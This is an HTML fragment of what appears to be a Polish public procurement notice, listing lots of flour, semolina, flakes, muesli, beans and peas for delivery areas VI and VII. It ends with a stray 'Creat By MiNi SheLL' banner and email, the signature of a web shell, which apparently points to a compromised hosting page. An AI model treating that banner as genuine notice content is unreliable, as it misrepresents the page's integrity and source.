<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mąka pszenna typ 500 - 5000 kg
Mąka ziemniaczana - 100 kg
Kasza manna - 400 kg
Płatki owsiane - 300 kg
Płatki kukurydziane - 300 kg
Musli jabłkowe - 150 kg
Musli truskawkowe - 150 kg
Musli morelowe - 150 kg
Fasola biała jednolita - 1000 kg
Fasola biała Jaś karłowy - 1000 kg
Groch obłuskany cały - 200 kg
Groch obłuskany połówki - 1300 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.33.00-1, 15.61.33.13-6, 03.21.22.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa do obszaru VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mąka pszenna typ 500 - 4000 kg
Kasza manna - 100 kg
Płatki owsiane - 100 kg
Płatki kukurydziane -100 kg
Musli jabłkowe - 50 kg
Musli truskawkowe - 50 kg
Musli morelowe - 50 kg
Fasola biała jednolita - 1500 kg
Fasola biała Jaś karłowy - 500 kg
Groch obłuskany cały - 500 kg
Groch obłuskany połówki - 500 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.33.00-1, 15.61.33.13-5, 03.21.22.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa do obszaru VII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mąka pszenna typ 500 - 2250 kg
Mąka ziemniaczana - 70 kg
Kasza manna - 140 kg
Płatki owsiane - 100 kg
Płatki kukurydziane - 230 kg
Musli jabłkowe - 210 kg
Musli truskawkowe - 210 kg
Musli morelowe - 210 kg
Fasola biała jednolita - 750 kg
Fasola biała Jaś karłowy - 550 kg
Groch obłuskany cały - 750 kg
Groch obłuskany połówki - 750 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.33.00-1, 15.61.33.13-5, 03.21.22.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com